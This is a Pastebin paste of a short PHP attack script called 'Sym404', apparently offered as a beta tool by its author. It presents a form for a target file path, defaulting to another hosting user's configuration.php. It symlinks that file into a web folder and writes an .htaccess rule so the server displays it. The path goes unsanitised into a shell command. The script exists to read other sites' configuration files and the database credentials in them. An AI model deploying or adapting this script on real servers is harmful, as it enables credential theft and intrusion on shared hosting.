Advertisement
AZZATSSINS_CYBERSERK

Sym404 (beta test)

Feb 1st, 2017
451
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.53 KB | None | 0 0
  1. <? /*SYM404 BETA TEST BY AZZATSSINS*/ @error_reporting(0);@ini_set('display_errors', 0); echo '<title>SYM404</title><body bgcolor=silver><center><form method="post"><br>File Target : <input name="fl" value="/home/user/public_html/configuration.php"> <input name="anu" type="submit" value="SYM"></form><br>';if($_POST['anu']){
  2. rmdir("sl");mkdir("sl", 0777);$fl = $_POST['fl'];system("ln -s ".$fl." sl/x.txt");symlink($fl,"sl/x.txt");$anu = fopen("sl/.htaccess", "w");
  3. fwrite($anu,"ReadmeName x.txt");
  4. echo'<a href=sl/x.txt>CECK</a>';
  5. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement